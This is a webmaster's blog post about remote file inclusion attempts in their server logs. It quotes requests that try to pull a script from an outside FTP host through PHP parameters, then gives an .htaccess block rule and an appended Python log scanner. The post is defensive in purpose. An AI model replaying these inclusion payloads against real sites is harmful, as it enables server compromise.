I've ranted before about those stupid script kiddies and their fruitless yet annoying attempts to exploit something that isn't there. Of course that didn't change a thing; we're still seeing more than 20% of the requests on our web server being inclusion attempts.
A new variation, however, is the use of ftp: links for the inclusion attempt:
81.89.137.99 - - [23/Feb/2008:00:10:34 -0500] "GET /forum/!scanftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 403 26 "-" "libwww-perl/5.805"
81.89.137.99 - - [23/Feb/2008:00:10:34 -0500] "GET /!scanftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 403 26 "-" "libwww-perl/5.805"
(...)
81.89.137.99 - - [23/Feb/2008:01:00:46 -0500] "GET /forum/index.php?show=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 403 26 "-" "libwww-perl/5.805"
81.89.137.99 - - [23/Feb/2008:01:00:46 -0500] "GET /index.php?show=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 403 26 "-" "libwww-perl/5.805"
(...)
81.89.137.99 - - [23/Feb/2008:01:01:59 -0500] "GET /forum/index.php?show=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 403 26 "-" "libwww-perl/5.805"
81.89.137.99 - - [23/Feb/2008:01:01:59 -0500] "GET /index.php?show=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 403 26 "-" "libwww-perl/5.805"
(...)
81.89.137.99 - - [23/Feb/2008:01:31:14 -0500] "GET /forum/admin/doeditconfig.php?thispath=../includes&config[path]=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 403 26 "-" "libwww-perl/5.805"
81.89.137.99 - - [23/Feb/2008:01:31:14 -0500] "GET /admin/doeditconfig.php?thispath=../includes&config[path]=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 403 26 "-" "libwww-perl/5.805"
This still seems to be somewhat experimental, though. Notice how the first two requests are broken, as they used "scanftp:", which isn't a valid scheme. The next two are useless, too, since those scripts don't have a "show" parameter. I also like how he threw in an http: inclusion attempt to see if that would make a difference.
The final attempts to exploit something in a file named doeditconfig.php (which is nowhere to be found on our site) appear to be an exploit copied straight from milw0rm. Too bad it's targeted at UBB, which we don't run.
I'd give him +1 point for creativity and -2 points for being too stupid to know what to do with it.
Btw, we have a simple .htaccess rule to block http: inclusion attempts. Let's expand that to cover ftp: links, too:
# Refuse any request whose query string carries a URL scheme, i.e. a remote
# file inclusion attempt. NC makes the match case-insensitive so "HTTP:" or
# "FTP:" can't slip past.
RewriteEngine On
RewriteCond %{QUERY_STRING} ^.+http: [NC,OR]
RewriteCond %{QUERY_STRING} ^.+ftp: [NC]
RewriteRule .* - [L,F]
There, that should do it.
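The same check, run offline over the log lines quoted above, as an added example that is not part of the original post and not the site's own tooling. It parses combined-format entries, URL-decodes each query parameter and flags values that start with a remote scheme; like the .htaccess rule it looks only at the query string, so the broken "!scanftp:" requests in the path are not flagged. Because it decodes before matching, a percent-encoded ftp%3A// value (a constructed line, not from the post) is caught too, whereas the RewriteCond patterns, which mod_rewrite applies to the raw QUERY_STRING, miss it; the second function shows that difference.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: four of the log lines quoted in the post, plus two
# made-up lines (a percent-encoded ftp:// value and a harmless request).
SAMPLE_LOG = """\
81.89.137.99 - - [23/Feb/2008:00:10:34 -0500] "GET /forum/!scanftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 403 26 "-" "libwww-perl/5.805"
81.89.137.99 - - [23/Feb/2008:01:00:46 -0500] "GET /forum/index.php?show=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 403 26 "-" "libwww-perl/5.805"
81.89.137.99 - - [23/Feb/2008:01:01:59 -0500] "GET /forum/index.php?show=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 403 26 "-" "libwww-perl/5.805"
81.89.137.99 - - [23/Feb/2008:01:31:14 -0500] "GET /forum/admin/doeditconfig.php?thispath=../includes&config[path]=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 403 26 "-" "libwww-perl/5.805"
10.0.0.1 - - [23/Feb/2008:02:00:00 -0500] "GET /index.php?show=ftp%3A%2F%2F192.0.2.7%2Fx HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.2 - - [23/Feb/2008:02:01:00 -0500] "GET /index.php?show=about&page=2 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Combined log format: client, identd, user, [timestamp], "METHOD target proto", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# A parameter value that starts with a remote scheme is what an inclusion payload looks like.
REMOTE_SCHEME = re.compile(r'^(https?|ftps?)://', re.IGNORECASE)
# The post's RewriteCond patterns, as mod_rewrite applies them to the raw query string.
RAW_RULE = re.compile(r'^.+(http|ftp):')


def find_rfi_attempts(log_text):
    """Return (client_ip, status, param, decoded_value) for every query
    parameter whose URL-decoded value begins with http(s):// or ftp(s)://."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not combined-format entries
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes values, so ftp%3A%2F%2F becomes ftp://
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_SCHEME.match(value):
                hits.append((m.group("ip"), int(m.group("status")), name, value))
    return hits


def rewrite_rule_would_block(raw_query):
    """Mimic the .htaccess rule: match on the query string as sent, undecoded."""
    return bool(RAW_RULE.match(raw_query))


if __name__ == "__main__":
    for ip, status, name, value in find_rfi_attempts(SAMPLE_LOG):
        print(f"{ip} status={status} {name}={value}")
```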